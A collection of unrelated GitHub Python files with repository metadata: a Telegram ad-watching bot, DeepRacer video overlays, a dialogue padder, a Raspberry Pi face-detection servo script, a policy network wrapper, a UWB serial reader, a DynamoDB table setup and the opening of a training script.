    ul = ul[0]
    items = ul.find_all("li")
    results = []
    for i in items:
        data = parse_result_item(i)
        if data is not None:
            results.append(data)
    if len(results) == 0:
        logging.warning(
            f"No results found for search term '{search_term}'. Check if parser works correctly."
        )
    return results
def init_search(search_term, chat_id):
    """
    Initialize a new search term.
    Executes one search and marks all current results as known.
    """
    # Refuse duplicates: one job per search term.
    if db.search(Job.search_term == search_term):
        raise JobExistsException
    known = [entry["ad_id"] for entry in execute_search(search_term)]
    db.insert({"search_term": search_term, "chat_id": chat_id, "known_ads": known})
def echo(update, context):
    """Echo any incoming text message back to the chat it came from."""
    chat_id = update.effective_chat.id
    text = update.message.text
    context.bot.send_message(chat_id=chat_id, text=text)
def start_watching(update, context):
    """
    Command handler for starting to watch a new search term.

    NOTE(review): ``"".join(context.args)`` concatenates multi-word terms
    without spaces ("red bike" -> "redbike"); stop_watching does the same,
    so the two stay consistent — confirm whether " ".join was intended.
    """
    search_target = "".join(context.args)
    try:
        init_search(search_target, update.effective_chat.id)
    except JobExistsException:
        reply = "Hm, looks like I'm watching that already."
    else:
        reply = f"Ok, I'll start watching '{search_target}'"
    context.bot.send_message(chat_id=update.effective_chat.id, text=reply)
def stop_watching(update, context):
    """
    Command handler for stopping to watch a search term

    NOTE(review): uses the same space-less ``"".join`` as start_watching so
    that stored terms match; keep the two in sync if this ever changes.
    """
    search_term = "".join(context.args)
    result = db.search(Job.search_term == search_term)
    if not result:
        reply = "I don't think I am watching that."
    else:
        db.remove(Job.search_term == search_term)
        reply = "Ok. I'll no longer watch " + search_term
    context.bot.send_message(chat_id=update.effective_chat.id, text=reply)
def look_for_stuff(context):
    """
    Job-queue callback: re-run every stored search and notify the owning
    chat about ads that have not been seen before.
    (Cleanup: removed a dead ``else: pass`` branch containing commented-out
    code.)
    """
    for job in db.all():
        known_ads = set(job["known_ads"])
        results = execute_search(job["search_term"])
        something_new = False
        for r in results:
            if r["ad_id"] not in known_ads:
                message = (
                    f"New item for {job['search_term']} ({r['price']}): {r['url']}"
                )
                context.bot.send_message(chat_id=job["chat_id"], text=message)
                known_ads.add(r["ad_id"])
                something_new = True
        if something_new:
            # Persist the enlarged id set so the same ads are not re-reported.
            db.update(
                {"known_ads": list(known_ads)}, Job.search_term == job["search_term"]
            )
def status(update, context):
    """Send the chat a bullet list of every search term currently watched."""
    header = "I'm currently watching: "
    entries = ["- " + job["search_term"] for job in db.all()]
    message = "\n".join([header] + entries) + "\n"
    context.bot.send_message(chat_id=update.effective_chat.id, text=message)
@click.group()
def cli():
    # Root command group for the CLI; `run` and `search` register themselves
    # via @cli.command().  Kept without a docstring on purpose: click would
    # surface one as --help text.
    pass
@cli.command()
@click.option("--token", prompt=True, help="The telegram bot api token")
def run(token):
    """Start the bot and poll telegram for updates."""
    # Cleanup: the previous version did `TELEGRAM_BOT_TOKEN = token`, which
    # only created an unused local shadowing the module-level constant; the
    # token is now passed straight through.  Unused handler/job temporaries
    # were removed as well.
    updater = Updater(token=token, use_context=True)
    dispatcher = updater.dispatcher

    # Re-run all stored searches every 5 minutes.
    updater.job_queue.run_repeating(look_for_stuff, interval=5 * 60, first=0)

    dispatcher.add_handler(MessageHandler(Filters.text & (~Filters.command), echo))
    dispatcher.add_handler(CommandHandler("start", start_watching))
    dispatcher.add_handler(CommandHandler("stop", stop_watching))
    dispatcher.add_handler(CommandHandler("status", status))

    updater.start_polling()
@cli.command()
@click.argument("searchterm")
def search(searchterm):
    # One-off CLI search: run the scraper once and print the parsed results.
    # (Comment rather than docstring so click's --help output is unchanged.)
    data = execute_search(searchterm)
    click.echo(data)
if __name__ == "__main__":
    # Entry point: dispatch to the click command group.
    cli()
| NiklasMM/ebk-bot | bot.py | bot.py | py | 5,611 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "tinydb.TinyDB",
"line_number": 10,
"usage_type": "call"
},
{
"api_name": "tinydb.Query",
"line_number": 11,
"usage_type": "call"
},
{
"api_name": "requests.get",
"line_number": 56,
"usage_type": "call"
},
{
"api_name": "bs4.BeautifulSoup",
"line... |
32716485591 | """ Image editing class for head to bot, time-trail, obstacle where
there is only single agent
"""
import datetime
import logging
import rospy
import cv2
from markov.log_handler.logger import Logger
from markov.utils import get_racecar_idx
from mp4_saving import utils
from mp4_saving.constants import (RaceCarColorToRGB,
IconographicImageSize,
TrackAssetsIconographicPngs, RACE_COMPLETE_Y_OFFSET,
RACE_TYPE_TO_VIDEO_TEXT_MAPPING, XYPixelLoc, AWS_DEEPRACER_WATER_MARK,
SCALE_RATIO, FrameQueueData)
from mp4_saving.image_editing_interface import ImageEditingInterface
from mp4_saving.top_view_graphics import TopViewGraphics
LOG = Logger(__name__, logging.INFO).get_logger()
class SingleAgentImageEditing(ImageEditingInterface):
""" Image editing class for head to bot, time-trail, obstacle where
there is only single agent
"""
    def __init__(self, racecar_name, racecar_info, race_type):
        """ Initializing the required data for the head to bot, time-trail. This is used for single agent
        Arguments:
            racecar_name (str): racecar name, used to derive this agent's index
            racecar_info (list): list of dict having information of the agent
            race_type (str): Since this class is reused for all the different race_type
        """
        self.racecar_info = racecar_info
        self.race_type = race_type
        # Fall back to index 0 when no index can be derived from the name.
        racecar_index = get_racecar_idx(racecar_name)
        self.racecar_index = racecar_index if racecar_index else 0
        # Store the font which we will use to write the phase with
        self.amazon_ember_regular_20px = utils.get_font('AmazonEmber-Regular', 20)
        self.amazon_ember_regular_16px = utils.get_font('AmazonEmber-Regular', 16)
        self.amazon_ember_heavy_30px = utils.get_font('AmazonEmber-Heavy', 30)
        self.amazon_ember_light_18px = utils.get_font('AmazonEmber-Light', 18)
        self.amazon_ember_light_20px = utils.get_font('AmazonEmber-Light', 20)
        self.amazon_ember_light_italic_20px = utils.get_font('AmazonEmber-LightItalic', 20)
        # Job flags pulled from ROS parameters.
        self.is_racing = rospy.get_param("VIDEO_JOB_TYPE", "") == "RACING"
        self.is_league_leaderboard = rospy.get_param("LEADERBOARD_TYPE", "") == "LEAGUE"
        self.leaderboard_name = rospy.get_param("LEADERBOARD_NAME", "")
        self._total_laps = int(rospy.get_param("NUMBER_OF_TRIALS", 0))
        # The track image as iconography
        self.track_icongraphy_img = utils.get_track_iconography_image()
        # Track image offset
        self.track_loc_offset = XYPixelLoc.TRACK_IMG_WITH_OFFSET_LOC.value if self.is_league_leaderboard \
            else XYPixelLoc.TRACK_IMG_WITHOUT_OFFSET_LOC.value
        # Gradient overlay image
        gradient_img_path = TrackAssetsIconographicPngs.OBSTACLE_OVERLAY_PNG_LEAGUE_LEADERBOARD.value \
            if self.is_league_leaderboard else TrackAssetsIconographicPngs.OBSTACLE_OVERLAY_PNG.value
        self.gradient_img = self._plot_track_on_gradient(gradient_img_path)
        self.gradient_alpha_rgb_mul, self.one_minus_gradient_alpha = utils.get_gradient_values(self.gradient_img)
        # Top camera information
        top_camera_info = utils.get_top_camera_info()
        self.top_view_graphics = TopViewGraphics(top_camera_info.horizontal_fov, top_camera_info.padding_pct,
                                                 top_camera_info.image_width, top_camera_info.image_height,
                                                 racecar_info)
    def _edit_major_cv_image(self, major_cv_image, mp4_video_metrics_info):
        """ Apply all the editing for the Major 45degree camera image
        Args:
            major_cv_image (Image): Image straight from the camera
            mp4_video_metrics_info (list): per-agent ROS metric messages;
                indexed by self.racecar_index
        Returns:
            Image: Edited main camera image (converted to BGRA at the end)
        """
        # Applying gradient to whole major image and then writing text
        major_cv_image = utils.apply_gradient(major_cv_image, self.gradient_alpha_rgb_mul,
                                              self.one_minus_gradient_alpha)
        # Top left location of the picture
        loc_x, loc_y = XYPixelLoc.SINGLE_AGENT_DISPLAY_NAME_LOC.value
        # Display name (Racer name/Model name), truncated to 15 characters.
        display_name = self.racecar_info[self.racecar_index]['display_name']
        display_name_txt = display_name if len(display_name) < 15 else "{}...".format(display_name[:15])
        major_cv_image = utils.write_text_on_image(image=major_cv_image, text=display_name_txt,
                                                   loc=(loc_x, loc_y), font=self.amazon_ember_regular_20px,
                                                   font_color=RaceCarColorToRGB.White.value,
                                                   font_shadow_color=RaceCarColorToRGB.Black.value)
        # Lap Counter (clamped to the configured total number of laps)
        loc_y += 30
        current_lap = min(int(mp4_video_metrics_info[self.racecar_index].lap_counter) + 1, self._total_laps)
        lap_counter_text = "{}/{}".format(current_lap, self._total_laps)
        major_cv_image = utils.write_text_on_image(image=major_cv_image, text=lap_counter_text,
                                                   loc=(loc_x, loc_y), font=self.amazon_ember_heavy_30px,
                                                   font_color=RaceCarColorToRGB.White.value,
                                                   font_shadow_color=RaceCarColorToRGB.Black.value)
        # total_evaluation_time (Race time)
        loc_y += 45
        total_eval_milli_seconds = mp4_video_metrics_info[self.racecar_index].total_evaluation_time
        time_delta = datetime.timedelta(milliseconds=total_eval_milli_seconds)
        total_eval_time_text = "Race | {}".format(utils.milliseconds_to_timeformat(time_delta))
        major_cv_image = utils.write_text_on_image(image=major_cv_image, text=total_eval_time_text,
                                                   loc=(loc_x, loc_y), font=self.amazon_ember_light_18px,
                                                   font_color=RaceCarColorToRGB.White.value,
                                                   font_shadow_color=RaceCarColorToRGB.Black.value)
        # Reset counter
        loc_y += 25
        reset_counter_text = "Reset | {}".format(mp4_video_metrics_info[self.racecar_index].reset_counter)
        major_cv_image = utils.write_text_on_image(image=major_cv_image, text=reset_counter_text,
                                                   loc=(loc_x, loc_y), font=self.amazon_ember_light_18px,
                                                   font_color=RaceCarColorToRGB.White.value,
                                                   font_shadow_color=RaceCarColorToRGB.Black.value)
        # Speed (location differs between evaluation and leaderboard layouts)
        loc_x, loc_y = XYPixelLoc.SPEED_EVAL_LOC.value
        if self.is_league_leaderboard:
            loc_x, loc_y = XYPixelLoc.SPEED_LEADERBOARD_LOC.value
        speed_text = "{} m/s".format(utils.get_speed_formatted_str(mp4_video_metrics_info[self.racecar_index].throttle))
        major_cv_image = utils.write_text_on_image(image=major_cv_image, text=speed_text,
                                                   loc=(loc_x, loc_y), font=self.amazon_ember_light_20px,
                                                   font_color=RaceCarColorToRGB.White.value,
                                                   font_shadow_color=RaceCarColorToRGB.Black.value)
        # Leaderboard name (league leaderboard only)
        if self.is_league_leaderboard:
            loc_x, loc_y = XYPixelLoc.LEADERBOARD_NAME_LOC.value
            major_cv_image = utils.write_text_on_image(image=major_cv_image, text=self.leaderboard_name,
                                                       loc=(loc_x, loc_y), font=self.amazon_ember_regular_16px,
                                                       font_color=RaceCarColorToRGB.White.value,
                                                       font_shadow_color=RaceCarColorToRGB.Black.value)
        # Evaluation type
        loc_x, loc_y = XYPixelLoc.RACE_TYPE_EVAL_LOC.value
        if self.is_league_leaderboard:
            loc_x, loc_y = XYPixelLoc.RACE_TYPE_RACE_LOC.value
        race_text = "race" if self.is_racing else "evaluation"
        evaluation_type_txt = "{} {}".format(RACE_TYPE_TO_VIDEO_TEXT_MAPPING[self.race_type], race_text)
        major_cv_image = utils.write_text_on_image(image=major_cv_image, text=evaluation_type_txt,
                                                   loc=(loc_x, loc_y), font=self.amazon_ember_light_italic_20px,
                                                   font_color=RaceCarColorToRGB.White.value,
                                                   font_shadow_color=RaceCarColorToRGB.Black.value)
        # AWS Deepracer logo at the bottom for the community leaderboard
        if self.is_league_leaderboard:
            major_cv_image = utils.write_text_on_image(image=major_cv_image, text=AWS_DEEPRACER_WATER_MARK,
                                                       loc=XYPixelLoc.AWS_DEEPRACER_WATER_MARK_LOC.value,
                                                       font=self.amazon_ember_regular_16px,
                                                       font_color=RaceCarColorToRGB.White.value,
                                                       font_shadow_color=RaceCarColorToRGB.Black.value)
        # Check if the done flag is set and set the banner appropriately
        if mp4_video_metrics_info[self.racecar_index].done and (int(self._total_laps) >= current_lap):
            # When the cv2 text is written, it automatically drops the alpha value of the image
            rel_y_offset = XYPixelLoc.TRACK_IMG_WITH_OFFSET_LOC.value[1] if self.is_league_leaderboard else 0
            racecomplete_image = utils.get_image(TrackAssetsIconographicPngs.RACE_COMPLETE_OVERLAY_PNG.value,
                                                 IconographicImageSize.RACE_COMPLETE_IMAGE_SIZE.value)
            x_offset = major_cv_image.shape[1] - racecomplete_image.shape[1]//2
            y_offset = major_cv_image.shape[0] - RACE_COMPLETE_Y_OFFSET - rel_y_offset - racecomplete_image.shape[0]//2
            major_cv_image = utils.plot_rectangular_image_on_main_image(
                major_cv_image, racecomplete_image, (x_offset, y_offset))
        major_cv_image = cv2.cvtColor(major_cv_image, cv2.COLOR_RGB2BGRA)
        return major_cv_image
    def _plot_track_on_gradient(self, gradient_img_path):
        """ For the given gradient apply the track iconographic image and use this to apply gradient
        on each camera frame. Previously this was done on the top camera which changed every frame. But
        with the track iconographic image set static, adding the track on gradient is more optimized.
        Arguments:
            gradient_img_path (str): Gradient image path
        Returns:
            (Image): Edited gradient image with track image
        """
        gradient_img = utils.get_image(gradient_img_path, IconographicImageSize.FULL_IMAGE_SIZE.value)
        gradient_img = cv2.cvtColor(gradient_img, cv2.COLOR_RGBA2BGRA)
        track_icongraphy_scaled = utils.resize_image(self.track_icongraphy_img, SCALE_RATIO)
        # Normalized alpha channel of the scaled track image, used below for
        # per-pixel blending.
        track_icongraphy_alpha = track_icongraphy_scaled[:, :, 3]/255.0
        # Track image is placed at the bottom right with some offset (only in leaderboard tracks)
        # Negative slice bounds address the region from the image's far edge.
        x_min = -(self.track_loc_offset[1] + track_icongraphy_scaled.shape[0])
        x_max = gradient_img.shape[0] - self.track_loc_offset[1]
        y_min = -(self.track_loc_offset[0] + track_icongraphy_scaled.shape[1])
        y_max = gradient_img.shape[1] - self.track_loc_offset[0]
        # This is used as the offset for plotting the agent dots
        self.track_start_loc = (gradient_img.shape[1] + y_min, gradient_img.shape[0] + x_min)
        # Alpha-blend the track icon into all four channels of the gradient.
        for channel in range(0, 4):
            gradient_img[x_min:x_max, y_min:y_max, channel] =\
                (track_icongraphy_alpha * track_icongraphy_scaled[:, :, channel]) + \
                (1 - track_icongraphy_alpha) * (gradient_img[x_min:x_max, y_min:y_max, channel])
        return gradient_img
    def _plot_agents_on_major_cv_image(self, major_cv_image, mp4_video_metrics_info):
        """ Add the agents, obstacles on the track.
        Arguments:
            major_cv_image (Image): Edited image having gradient, text, track
            mp4_video_metrics_info (List): List of ROS metric values of each agent
        Returns:
            Image: Edited image with gradient, text, track and agents with dots
        """
        agents_loc = [(metric.x, metric.y) for metric in mp4_video_metrics_info]
        objects_loc = []
        # Object (obstacle/bot) locations are only published on the first
        # agent's metrics message.
        if mp4_video_metrics_info[0].object_locations:
            objects_loc = [(object_loc.x, object_loc.y) for object_loc in mp4_video_metrics_info[0].object_locations]
        return self.top_view_graphics.plot_agents_as_circles(
            major_cv_image, agents_loc, objects_loc, self.track_start_loc)
    def edit_image(self, major_cv_image, metric_info):
        """Apply all single-agent overlays (text panel + track dots) to a frame.

        Args:
            major_cv_image (Image): raw frame from the main camera
            metric_info (dict): frame-queue payload; only the agent metric
                list is used here
        """
        mp4_video_metrics_info = metric_info[FrameQueueData.AGENT_METRIC_INFO.value]
        major_cv_image = self._edit_major_cv_image(major_cv_image, mp4_video_metrics_info)
        major_cv_image = self._plot_agents_on_major_cv_image(major_cv_image, mp4_video_metrics_info)
return cv2.cvtColor(major_cv_image, cv2.COLOR_BGRA2RGB)
| aws-deepracer-community/deepracer-simapp | bundle/src/deepracer_simulation_environment/scripts/mp4_saving/single_agent_image_editing.py | single_agent_image_editing.py | py | 13,347 | python | en | code | 79 | github-code | 36 | [
{
"api_name": "markov.log_handler.logger.Logger",
"line_number": 20,
"usage_type": "call"
},
{
"api_name": "logging.INFO",
"line_number": 20,
"usage_type": "attribute"
},
{
"api_name": "mp4_saving.image_editing_interface.ImageEditingInterface",
"line_number": 22,
"usage_t... |
18526754583 | import logging
import tqdm
from multiprocessing import Pool
from dsrt.config.defaults import DataConfig
class Padder:
    def __init__(self, properties, parallel=True, config=DataConfig()):
        """Cache padding-related settings and set up logging.

        NOTE(review): ``DataConfig()`` as a default argument is evaluated
        once at class-definition time and shared by every call — confirm
        this is intended.
        """
        self.properties = properties
        self.config = config
        self.parallel = parallel
        self.max_ulen = self.properties['max-utterance-length']
        self.max_dlen = self.properties['max-dialogue-length']
        self.init_logger()
    def init_logger(self):
        """Attach the root logger and apply the configured logging level."""
        self.logger = logging.getLogger()
        self.logger.setLevel(self.config['logging-level'])
    def transform(self, dialogues):
        """Pad every dialogue, fanning the work out over a process pool.

        Also initializes ``self.empty_turn`` (a fully padded utterance),
        which ``pad_dialogue`` relies on for hierarchical models.
        """
        self.log('info', 'Padding the dialogues (using max utterance length={} tokens) ...'.format(self.max_ulen))
        self.empty_turn = [self.config['pad-d']] * (self.properties['max-utterance-length'] + 1)
        chunksize=self.config['chunksize']
        # A single-worker pool keeps the code path identical when
        # parallelism is disabled.
        p = Pool() if self.parallel else Pool(1)
        res = []
        total = len(dialogues)
        self.log('info', '[padder running on {} cores]'.format(p._processes))
        for d in tqdm.tqdm(p.imap(self.pad_dialogue, dialogues, chunksize=chunksize), total=total):
            res.append(d)
        p.close()
        p.join()
        return res
    def pad_dialogues(self, dialogues):
        """
        Pad the entire dataset.
        This involves adding padding at the end of each sentence, and in the case of
        a hierarchical model, it also involves adding padding at the end of each dialogue,
        so that every training sample (dialogue) has the same dimension.
        """
        # Sequential counterpart of transform(); note it does not set
        # self.empty_turn, so transform() must have run first for
        # hierarchical padding to work.
        self.log('info', 'Padding the dialogues ...')
        return [self.pad_dialogue(d) for d in dialogues]
def pad_dialogue(self, dialogue):
for i, u in enumerate(dialogue):
dif = self.max_ulen - len(u) + 1
dialogue[i] += [self.config['pad-u']] * dif
# only pad the dialogue if we're training a hierarchical model
if self.config['hierarchical']:
dif = self.max_dlen - len(dialogue)
dialogues += [self.empty_turn] * dif
return dialogue
####################
# UTILITIES #
####################
    def log(self, priority, msg):
        """
        Just a wrapper, for convenience.
        NB1: priority may be set to one of:
            - CRITICAL [50]
            - ERROR [40]
            - WARNING [30]
            - INFO [20]
            - DEBUG [10]
            - NOTSET [0]
            Anything else defaults to [20]
        NB2: the levelmap is a defaultdict stored in Config; it maps priority
            strings onto integers
        """
        # NOTE(review): the implementation below ignores 'priority' and logs
        # everything at CRITICAL, contradicting this docstring — it should
        # map the priority string to the matching logging level.
self.logger.log(logging.CRITICAL, msg)
| sbarham/dsrt | dsrt/data/transform/Padder.py | Padder.py | py | 2,765 | python | en | code | 1 | github-code | 36 | [
{
"api_name": "dsrt.config.defaults.DataConfig",
"line_number": 8,
"usage_type": "call"
},
{
"api_name": "logging.getLogger",
"line_number": 19,
"usage_type": "call"
},
{
"api_name": "multiprocessing.Pool",
"line_number": 28,
"usage_type": "call"
},
{
"api_name": ... |
29055282773 | import io
import picamera
import cv2
import numpy
import serial
import time
import RPi.GPIO as gp
####### Servo Motor Control #######
# Configure board pin 11 for 50 Hz PWM to drive the servo; start at ~3% duty
# cycle (first position).
gp.setmode(gp.BOARD)
gp.setup(11, gp.OUT)
pwm=gp.PWM(11, 50)
pwm.start(3)
port = '/dev/ttyACM0'  # serial port of the attached microcontroller
Face = 0  # 0: no face seen, 1: face detected this sweep, 2: detection handled
turn=1    # main-loop flag; loop exits via break ('turn = 0' is commented out below)
# Main loop: sweep the servo through three positions, grab a frame at each,
# and run Haar-cascade face detection.  On a detection the controller is told
# to stop (b'0') and a short video is recorded; after the sweep a resume
# command (b'1') is sent.
while(turn):
    i=3
    while(i):
        # Create a memory stream so photos don't need to be saved in a file
        stream = io.BytesIO()
        # Get the picture (low resolution, so it should be quite fast)
        # Here you can also specify other parameters (e.g.: rotate the image)
        with picamera.PiCamera() as camera:
            camera.resolution = (320, 240)
            camera.capture(stream, format='jpeg')
            print("Captured......................")
        # Convert the picture into a numpy array
        # NOTE(review): numpy.fromstring is deprecated; numpy.frombuffer is
        # the modern equivalent for raw bytes.
        buff = numpy.fromstring(stream.getvalue(), dtype=numpy.uint8)
        # Now creates an OpenCV image
        image = cv2.imdecode(buff, 1)
        # Load a cascade file for detecting faces
        face_cascade = cv2.CascadeClassifier('/home/pi/Desktop/Buddy/haarcascade_frontalface_alt.xml')
        # Convert to grayscale
        gray = cv2.cvtColor(image,cv2.COLOR_BGR2GRAY)
        # Look for faces in the image using the loaded cascade file
        faces = face_cascade.detectMultiScale(gray, 1.1, 5)
        #print "Found "+str(len(faces))+" face(s)"
        # Draw a rectangle around every found face
        for (x,y,w,h) in faces:
            Face = 1
            cv2.rectangle(image,(x,y),(x+w,y+h),(255,255,0),2)
            print("Detected")
            # Crude busy-wait delay, then tell the controller to stop.
            ser = serial.Serial(port, 9600, timeout=1)
            t=0
            while(t<2000):
                if(t%10 == 0):
                    print(t)
                t+=1
            ser.write(b'0') ## Stop_Detected
            # Record a short clip of the detected person.
            with picamera.PiCamera() as camera:
                print("Start Video")
                camera.start_recording('examplevid.h264')
                time.sleep(5)
                camera.stop_recording()
                print("Stop Video")
        # Save the result image (one file per servo position)
        if(i==3):
            cv2.imwrite('result1.jpg',image)
        if(i==2):
            cv2.imwrite('result2.jpg',image)
        if(i==1):
            cv2.imwrite('result3.jpg',image)
        i=i-1
        if(Face == 1):
            Face = 2
            break
        ################ Move Servo ##################
        # NOTE(review): i was already decremented above, so the position
        # selected here corresponds to the *next* capture — confirm the
        # intended sweep order.
        if(i==0):
            pwm.ChangeDutyCycle(3)
            #ser.write(b'1') ## Move_Servo_pos1
            print("First Pos__________________________")
        if(i==2):
            pwm.ChangeDutyCycle(5)
            #ser.write(b'2') ## Move_Servo_pos2
            print("Second Pos__________________________")
        if(i==1):
            pwm.ChangeDutyCycle(7)
            #ser.write(b'3') ## Move_Servo_pos3
            print("Third Pos__________________________")
        # Busy-wait pause between servo positions.
        t=0
        while(t<200):
            if(t%10 == 0):
                print(t)
            t+=1
    print("###############################################");
    t=0
    while(t<500):
        if(t%10 == 0):
            print(t)
        t+=1
#    turn = 0
    if(cv2.waitKey(1) & 0xFF == ord('q')):
        break
    if(Face == 2):
        Face = 0
        # Detection handled: busy-wait, tell the controller to resume (b'1'),
        # then leave the main loop.
        ser = serial.Serial(port, 9600, timeout=1)
        t=0
        while(t<2000):
            if(t%10 == 0):
                print(t)
            t+=1
        ser.write(b'1');
        break
break
| FarhatBuet14/Rescue-BOT | Codes/main.py | main.py | py | 3,571 | python | en | code | 1 | github-code | 36 | [
{
"api_name": "RPi.GPIO.setmode",
"line_number": 10,
"usage_type": "call"
},
{
"api_name": "RPi.GPIO",
"line_number": 10,
"usage_type": "name"
},
{
"api_name": "RPi.GPIO.BOARD",
"line_number": 10,
"usage_type": "attribute"
},
{
"api_name": "RPi.GPIO.setup",
"l... |
2811075086 | from torch import optim
from torch.distributions import Categorical
import importlib
class Model():
def __init__(self, config, modelParam, env):
self.update_counter = 0
if modelParam['cuda']['use_cuda']:
self.device = f"cuda:{modelParam['cuda']['device_idx']}"
else:
self.device = "cpu"
self.config = config
self.modelParam = modelParam
self.policyNet = self.selectPolicyNet(config, env.size_of_state_space, env.size_of_action_space)
self.policyNet.to(self.device)
self.optimizer = self.selectOptimizer(config)
return
def selectPolicyNet(self, config, size_of_state_space, size_of_action_space):
#Importing the network class based on the config[network] key
module = importlib.import_module("networks." + config['network'])
net = getattr(module, config['network'])(size_of_state_space, size_of_action_space)
return net
def selectOptimizer(self, config):
if config['optimizer'] == 'adam':
optimizer = optim.Adam(self.policyNet.parameters(), lr=config['learningRate']['lr'], weight_decay=config['weight_decay'])
elif config['optimizer'] == 'SGD':
optimizer = optim.SGD(self.policyNet.parameters(), lr=config['learningRate']['lr'],weight_decay=config['weight_decay'])
elif config['optimizer'] == 'RMSprop':
optimizer = optim.RMSprop(self.policyNet.parameters(), lr=config['learningRate']['lr'],weight_decay=config['weight_decay'])
else:
raise Exception('invalid optimizer')
return optimizer
def select_action(self, state):
state = state.to(self.device)
probs = self.policyNet(state)
m = Categorical(probs)
action = m.sample()
log_probs = m.log_prob(action)
return action.item(), log_probs
| ivartz/IN9400_exercises | week14/exercise/policy_learning/utils/model.py | model.py | py | 1,937 | python | en | code | 1 | github-code | 36 | [
{
"api_name": "importlib.import_module",
"line_number": 26,
"usage_type": "call"
},
{
"api_name": "torch.optim.Adam",
"line_number": 32,
"usage_type": "call"
},
{
"api_name": "torch.optim",
"line_number": 32,
"usage_type": "name"
},
{
"api_name": "torch.optim.SGD"... |
74207456423 | import argparse
import logging
log_debug = logging.getLogger("debugLog")
_available_commands = ["list"]
def get_parser(parent=None):
# Anomaly commands
conf_file_parser = argparse.ArgumentParser(add_help=False)
conf_file_parser.add_argument('--config_file', '--config_path', help='Path to config file', metavar='[path]',
dest="config_file")
if not parent:
admin = argparse.ArgumentParser(description='Deployment control', prog='deployment control',
parents=[conf_file_parser])
admin.add_argument("--debug", help="Run command in debug mode", dest="debug", action='store_true')
else:
admin = parent.add_parser('admin', help='Deployment control')
# Admin commands
admin_parser = argparse.ArgumentParser(add_help=False)
admin_parser.add_argument("list", help="List %(prog)ss")
admin_parser.add_argument('--host', help='Hostname or ip of target', metavar='[hostname]',
dest='target_host', default='all')
admin_parser.add_argument('--config-path', help='Path to config file', metavar='[path]',
dest="config_path", action='store')
# add more admin commands here
# Admin parser
admin_subcommands = admin.add_subparsers(dest="target")
admin_container = admin_subcommands.add_parser('container', prog='Container', parents=[admin_parser])
admin_node = admin_subcommands.add_parser('node', prog='Node', parents=[admin_parser])
admin_network = admin_subcommands.add_parser('network', prog='Network', parents=[admin_parser])
admin_network.add_argument('--interface', help='Name of interface', type=str, metavar='[NAME]',
dest="target_interface")
admin_deployment = admin_subcommands.add_parser('deployment', prog='Deployment', parents=[admin_parser])
if parent:
return parent
else:
return admin
def parse_arguments(args):
args = vars(args)
unpacked = unpack_targets(args)
unpacked.update(unpack_params(args))
log_debug.debug("Unpacked arguments" + str(unpacked))
return unpacked
def unpack_targets(args):
_unpacked = dict()
for arg in args:
if "target" in arg and args[arg]:
param_split = arg.split("_")
if len(param_split) > 1:
_unpacked[param_split[1]] = args[arg]
else:
_unpacked[arg] = args[arg]
return {"target": _unpacked}
def unpack_params(args):
_unpacked = dict()
for arg in args:
if arg in _available_commands:
return {"action": arg}
| Ydjeen/openstack_anomaly_injection | openstack_anomaly_injection/anomaly_injection/node_control/config/argparser.py | argparser.py | py | 2,668 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "logging.getLogger",
"line_number": 5,
"usage_type": "call"
},
{
"api_name": "argparse.ArgumentParser",
"line_number": 12,
"usage_type": "call"
},
{
"api_name": "argparse.ArgumentParser",
"line_number": 17,
"usage_type": "call"
},
{
"api_name": "argp... |
7305309200 | import serial
import serial
from time import sleep
import threading
import time
# sudo chmod 666 /dev/ttyACM0
device_port = "/dev/ttyACM0"
from multiprocessing.pool import ThreadPool
import settings
class uwb_data(threading.Thread):
def __init__(self,file_name,device_port):
threading.Thread.__init__(self)
self.file_name = file_name
self.serial = serial.Serial(device_port)
self.running = True
self.myval = []
def create_csv_file(self):
self.f = open(self.file_name, 'w+')
self.f.write("timestamp,x,y,z \n")
sleep(1)
def store_uwb_data(self):
val = str(self.serial.readline().decode().strip(' \r\n'))
if val.startswith('+DPOS:'):
val = val.strip('+DPOS:')
val = val.split(',')
self.myval = [int(float(val[2])),int(float(val[3]))]
def get_uwb_data(self):
return self.myval
def run(self):
while self.running:
self.store_uwb_data()
settings.myList = self.get_uwb_data()
def terminate(self):
"""clean stop"""
self.running = False
if __name__ == "__main__":
uwb_get_way = uwb_data('IDRdata.csv',"/dev/ttyACM0")
uwb_get_way.start()
pool = ThreadPool(processes=1)
try:
while True:
async_result = pool.apply_async(uwb_get_way.get_uwb_data)
return_val = async_result.get()
print(settings.myList)
except (KeyboardInterrupt, SystemExit):
uwb_get_way.terminate()
print("killed") | CoRotProject/FOF-API | Agents/UWB_agent/uwb_data.py | uwb_data.py | py | 1,567 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "threading.Thread",
"line_number": 11,
"usage_type": "attribute"
},
{
"api_name": "threading.Thread.__init__",
"line_number": 13,
"usage_type": "call"
},
{
"api_name": "threading.Thread",
"line_number": 13,
"usage_type": "attribute"
},
{
"api_name": ... |
35864084249 | from __future__ import print_function
import boto3
#This module creates a table with the table constraints as well
dynamodb = boto3.resource('dynamodb', region_name='us-west-2', endpoint_url='http://localhost:8000', aws_access_key_id='Secret', aws_secret_access_key='Secret')
table = dynamodb.create_table(
TableName = 'Movies',
KeySchema=[
{
'AttributeName': 'year',
'KeyType': 'HASH' #Partition key
},
{
'AttributeName': 'title',
'KeyType': 'RANGE' #Sort key
}
],
AttributeDefinitions=[
{
'AttributeName': 'year',
'AttributeType': 'N'
},
{
'AttributeName': 'title',
'AttributeType': 'S'
},
],
ProvisionedThroughput={
'ReadCapacityUnits': 10,
'WriteCapacityUnits': 10
}
) | Codexdrip/DynamoDB-Testing | MoviesCreateTable.py | MoviesCreateTable.py | py | 894 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "boto3.resource",
"line_number": 6,
"usage_type": "call"
}
] |
7494741687 | """Train a model on Treebank"""
import random
import json
import numpy as np
import torch
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
import torch.optim.lr_scheduler as sched
import torch.utils.data as data
import utils
from collections import OrderedDict
from tqdm import tqdm
from torch.utils.tensorboard import SummaryWriter
from args import get_train_args
from models import investorConferenceAnalyzer
from utils import Treebank, collate_fn
def main(args):
# Set up logging and devices
args.save_dir = utils.get_save_dir(args.save_dir, args.name, training=True)
log = utils.get_logger(args.save_dir, args.name)
tbx = SummaryWriter(args.save_dir)
device, args.gpu_ids = utils.get_available_devices()
log.info(f'Args: {json.dumps(vars(args), indent=4, sort_keys=True)}')
args.batch_size *= max(1, len(args.gpu_ids))
# Set random seed
log.info(f'Using random seed {args.seed}...')
random.seed(args.seed)
np.random.seed(args.seed)
